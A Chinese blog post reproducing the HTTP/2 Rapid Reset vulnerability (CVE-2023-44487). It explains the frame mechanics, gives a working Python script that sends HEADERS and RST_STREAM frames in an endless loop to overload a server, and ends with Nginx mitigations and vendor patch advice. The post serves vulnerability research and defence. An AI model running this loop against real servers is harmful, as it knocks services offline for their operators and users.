漏洞验证:HTTP/2的快速重置DOS攻击(CVE-2023-44487)

已于 2023-10-24 21:44:14 修改
阅读量2.7k 收藏 1
点赞数 1
分类专栏: 漏洞 http 文章标签: 1024程序员节 网络安全 安全 http web安全
于 2023-10-24 16:55:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53523921/article/details/134016152
版权
本文介绍了HTTP/2协议中的RST_STREAM帧如何被恶意利用形成DDoS攻击,通过Python代码示例展示了攻击原理。同时提到Nginx不受此漏洞影响的配置以及漏洞的预防措施,强调及时更新以保障系统安全。
摘要由CSDN通过智能技术生成

声明

本篇文章仅用于漏洞复现与技术研究,请勿利用文章内的相关技术从事非法测试,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用!!!

一、漏洞原理

对于 HTTP/1.1来说,HTTP/2 协议的一个更新点在于 单连接上的多路复用:就是说HTTP/2 协议允许在单个连接上同时发送多个请求,每个 HTTP 请求和响应都使用不同的流。

这些数据流称为 数据帧 ,其中比较重要的包括:

  • SETTINGS 帧:控制消息,用于传递关于 http2 连接的配置参数,例如 SETTINGS_MAX_CONCURRENT_STREAMS 定义连接上的最大并发流数目。

  • RST_STREAM 帧:直接取消一个流。如果客户端不想再接收服务端的响应,可以直接发送 RST_STREAM 帧。

客户端可以通过发送 RST_STREAM帧直接取消一个流,当服务端收到一个 RST_STREAM帧时,会直接关闭该流。

此时 客户端 可以不停向 服务器 发送请求,中间不用等待任何响应,导致 服务器 陷入了接受请求-处理请求-直接结束请求的循环中。

攻击者就可以利用该漏洞,通过持续的HEADERSRST_STREAM帧组合,来消耗 服务器 资源,进而影响 服务器 正常请求的处理,造成 DDoS 攻击。

二、编写python代码

#!/usr/bin/env python3
 
import socket
import ssl
import certifi
 
import h2.connection
import h2.events
 
 
SERVER_NAME = '127.0.0.1'
SERVER_PORT = 443
 
# generic socket and ssl configuration
socket.setdefaulttimeout(15)
ctx = ssl.create_default_context(cafile=certifi.where())
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(['h2'])
 
# open a socket to the server and initiate TLS/SSL
s = socket.create_connection((SERVER_NAME, SERVER_PORT))
s = ctx.wrap_socket(s, server_hostname=SERVER_NAME)
 
c = h2.connection.H2Connection()
c.initiate_connection()
s.sendall(c.data_to_send())
 
headers = [
    (':method', 'GET'),
    (':path', '/'),
    (':authority', SERVER_NAME),
]
 
while True:
    stream_id = c.get_next_available_stream_id()
    print(stream_id)
    c.send_headers(stream_id, headers, end_stream=True)
    s.sendall(c.data_to_send())
    c.reset_stream(stream_id)
    s.sendall(c.data_to_send())
 
# tell the server we are closing the h2 connection
c.close_connection()
s.sendall(c.data_to_send())
 
# close the socket
s.close()

代码实现功能:不断发送 HEADERS 帧和 RST_STREAM 帧序列。

在本地或者云搭建好相应的服务器环境,HTTP/2协议,用py脚本进行测试运行,即可看到服务器负载快速增加,并且出现明显卡顿。

三、不受影响的版本:nginx

Nginx 中有如下的的默认值配置,该攻击对 Nginx 基本无影响:

  • keepalive_requests:保持默认配置 1000

  • http2_max_concurrent_streams:保持默认配置 128

Nginx 1.19.7 及其之后版本是通过keepalive_requests 来限制一个 HTTP/2 TCP 连接上请求总数量。

1.19.7 之前的版本是通过http2_max_requests 来实现该目的。

Nginx 能够限制一个 TCP 连接上的请求总数量为 1000 个。如果攻击者想持续利用该漏洞,就不得不新建新的 TCP 连接。

四、漏洞预防

遵循供应商的建议,及时进行更新。Microsoft 已发布 IIS (HTTP.sys) 和 .NET (Kestrel) 的更新。Apache 软件基金会发布了 Tomcat 的更新,F5 发布了 Nginx 的更新。

闵宇伊豪
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
分享国外安全团队及工具
专注企业信息安全-sec
03-19 1万+
名称 版 描述 主页 0trace 1.5 跳跃枚举工具 http://jon.oberheide.org/0trace/ 3proxy 0.7.1.1 微小的免费代理服务器。 http://3proxy.ru/ 3proxy-win32的 0.7.1....
Burpsuite 指纹特征绕过
Javachichi的博客
12-05 1967
需要高版本 17 + 的 burp 运行插件,可 bypass 网站流量设备的检测,正常抓包。未使用插件前,burp 指纹特征被识别,抓包被拦截。
解析针对 HTTP/2 协议的不同步攻击
HBohan的博客
09-06 848
HTTP/2 很容易被误认为是一种传输层协议,HTTP/2 (原名HTTP/2.0)即超文本传输协议 2.0,是下一代HTTP协议。是由互联网工程任务组(IETF)的Hypertext Transfer Protocol Bis (httpbis)工作小组进行开发。是自1999年http1.1发布后的首个更新。HTTP 2.0在2013年8月进行首次合作共事性测试。在开放互联网上HTTP 2.0将只用于https://网址,而 http://网址将继续使用HTTP/1,目的是在开放互联网上增加使用加密技术,
HTTP/2 中的漏洞CVE-2023-44487
2301_80115097的博客
10-19 1万+
最近安全圈公布了一个利用 HTTP/2 快速重置机制进行 DDoS 攻击的 0day 漏洞,,鉴于 HTTP/2 协议已经在 Internet 上广泛使用,所以该漏洞一经发布,在业界引起广泛关注。我们介绍过,雷池 WAF 使用 Nginx 作为其代理模式下的流量转发引擎,Nginx 已经在其官网介绍了。简单来说,Nginx 作为一款久经考验的,其本身就提供过了多种方式来缓解 DDoS 攻击。需要说明的是,Nginx 1.19.7 及其之后版本是通过。
【OPNEGIS】Geoserver原地升级jetty,解决Apache HTTP/2拒绝服务漏洞 (CVE-2023-44487)
zhoulizhu的博客
12-11 4935
Geoserver是我们常用的地图服务器,在开源系统中的应用比较广泛。在实际环境中,我们可能会选用官方的二进制安装包进行部署,这样只要服务器上有java环境就可以运行,方便在现场进行部署。
CVE-2023-44487漏洞修复
最新发布
单调枯燥的CC的博客
04-28 1087
CVE-2023-44487漏洞修复
漏洞CVE-2023-44487 HTTP2
zkaqlaoniao的博客
10-31 1842
最近安全圈公布了一个利用 HTTP/2 快速重置机制进行 DDoS 攻击的 0day 漏洞CVE-2023-44487,鉴于 HTTP/2 协议已经在 Internet 上广泛使用,所以该漏洞一经发布,在业界引起广泛关注。之前文章我们介绍过,雷池 WAF 使用 Nginx 作为其代理模式下的流量转发引擎,Nginx 已经在其官网介绍了该漏洞对 Nginx 的影响。简单来说,Nginx 作为一款久经考验的,其本身就提供过了多种方式来缓解 DDoS 攻击。:保持默认配置 1000:保持默认配置 128。
安全测试-- WEB 实战
Qton_CSDN的博客
02-27 3309
  增:XSS、文件上传get shell 删:越权 查:sql注入、越权 改:XSS、越权 好  也可以用wvs先扫 根据报告找漏洞的点            一  端口信息收集 kali : nmap -A -T4 192.168.1.35 端口信息收集  端口信息收集资料 问题:端口扫描是指某些别有用心的人发送一组端口扫描消息,试图以此侵入某台计算机,并了解其提供的...
2019年度优秀安全内容合集
热门推荐
anquanzushiye的博客
01-06 3万+
2019信息源与信息类型占比微信公众号推荐昵称_英语weixin_no标题网址安全祖师爷PowerShell渗透–帝国https://mp.weixin.qq.com/s/giBR-rn...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5546
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
CVE-2023-44487 HTTP2漏洞
hackzkaq的博客
11-02 2039
最近安全圈公布了一个利用 HTTP/2 快速重置机制进行 DDoS 攻击的 0day 漏洞CVE-2023-44487,鉴于 HTTP/2 协议已经在 Internet 上广泛使用,所以该漏洞一经发布,在业界引起广泛关注。之前文章我们介绍过,雷池 WAF 使用 Nginx 作为其代理模式下的流量转发引擎,Nginx 已经在其官网介绍了该漏洞对 Nginx 的影响。简单来说,Nginx 作为一款久经考验的,其本身就提供过了多种方式来缓解 DDoS 攻击。:保持默认配置 1000:保持默认配置 128。
HTTP/2 中的漏洞
ptsecurity的博客
10-11 3354
要利用该漏洞,攻击者需要在 HTTP/2 会话中打开大量请求,然后在不等待服务器响应的情况下,使用RST_STREAM 请求中断连接。利用该漏洞可以在客户端负载最小的情况下,向服务器发送大量请求流,从而导致系统拒绝服务。Apache 软件基金会发布了 Tomcat 的更新,F5 发布了 Nginx 的更新。该漏洞HTTP/2 协议实施中的一个缺陷有关,可用于实施 DDoS 攻击。使用该漏洞的攻击被命名为 HTTP/2 快速重置。如果安装了最新的知识库更新,将自动识别易受攻击的资产。
深入分析漏洞原理- CVE-2023-44487 HTTP2
2301_80115097的博客
10-31 677
最近安全圈公布了一个利用 HTTP/2 快速重置机制进行 DDoS 攻击的 0day 漏洞CVE-2023-44487,鉴于 HTTP/2 协议已经在 Internet 上广泛使用,所以该漏洞一经发布,在业界引起广泛关注。之前文章我们介绍过,雷池 WAF 使用 Nginx 作为其代理模式下的流量转发引擎,Nginx 已经在其官网介绍了该漏洞对 Nginx 的影响。简单来说,Nginx 作为一款久经考验的,其本身就提供过了多种方式来缓解 DDoS 攻击。:保持默认配置 1000:保持默认配置 128。
Zookeeper处理jetty CVE-2023-44487漏洞
lanluyug的博客
03-01 1212
Apache HTTP/2拒绝服务漏洞CVE-2023-44487) jetty/9.4.52.v20230823。直接在zookeeper安装目录下lib里替换jetty相关的包。重启zookeeper。
WEB安全-金手铐系列-HTTP/2高级请求夹带攻击--Advanced request smuggling
Eason_LYC安全白帽子的成长博客
05-27 978
本文详细介绍了HTTP/2的基础知识和相关安全知识,并有详细靶场讲解。 阅读此文需要一定的HTTP基础,若看不懂的话,不要紧,请先三连。后续我会将我的文章根据知识点的先后顺序和难易程度分组,方便大家阅读,谢谢。
采用HTTP/2协议的浏览器能抵御HEIST攻击吗?
weixin_33842328的博客
07-10 125
HEIST是一项新的HTTP/2协议漏洞,它能从HTTPS通讯中盗取加密内容。安全专家Michael Cobb将在下文解释此种攻击的实现原理以及如何阻止这种攻击。 HTTP/2协议设计的初衷是为改进安全和性能,但这也显然会使威胁因素能够造成更大的破坏。在2016年的美国Black Hat大会上,来自比利时鲁汶大学(University of Leuven...
漏洞处置:HTTP/2 快速重置攻击对 F5 NGINX 的影响
NGINX开源社区的博客
02-28 1071
本文主要介绍了最近发现的一个与 HTTP/2 协议有关的漏洞——HTTP/2 快速重置HTTP/2 Rapid Reset)攻击。在特定条件下,攻击者可利用此漏洞在 NGINX 开源版、NGINX Plus 以及在服务器端实施 HTTP/2 规范的相关产品上执行拒绝服务(DoS)攻击。为了保护您的系统免遭此类攻击,我们建议您立即更新 NGINX 配置。
十月补丁星期二值得关注的漏洞
smellycat000的专栏
10-11 216
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士十月补丁星期二Adobe和微软均发布安全更新。Adobe 十月补丁日10月份,Adobe 发布了三份安全公告,修复了位于 Adobe Photoshop、Bridge和Adobe Commerce 中的13个CVE漏洞。其中Commerce 本月修复的漏洞数量最多,共有10个‘’严重”和“重要”级别的漏洞,其中最严重的漏洞可导致攻击者通过SQL注...
cve-2023-44487 漏洞修复
12-30
根据引用[1]提供的信息,CVE-2023-44487是一个利用HTTP/2协议的快速重置机制进行DDoS攻击的0day漏洞。为了修复这个漏洞,以下是一些可能的解决方法: 1. 更新HTTP/2实现:检查您使用的HTTP/2实现是否有任何已知的漏洞,并确保您使用的是最新版本。如果存在已知的漏洞,及时更新到修复版本。 2. 配置防火墙:配置防火墙以阻止恶意的HTTP/2请求。可以根据特定的攻击模式设置规则,例如限制连接速率或限制特定类型的请求。 3. 负载均衡器设置:如果您使用负载均衡器来处理HTTP/2请求,确保负载均衡器已经更新到修复了该漏洞的版本。 4. 安全审计:对您的网络进行安全审计,以查找可能存在的其他漏洞或弱点,并采取相应的措施进行修复。 请注意,这些方法只是一些可能的解决方案,具体的修复方法可能因系统配置和环境而异。建议您在修复漏洞之前咨询安全专家或参考相关厂商的建议。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值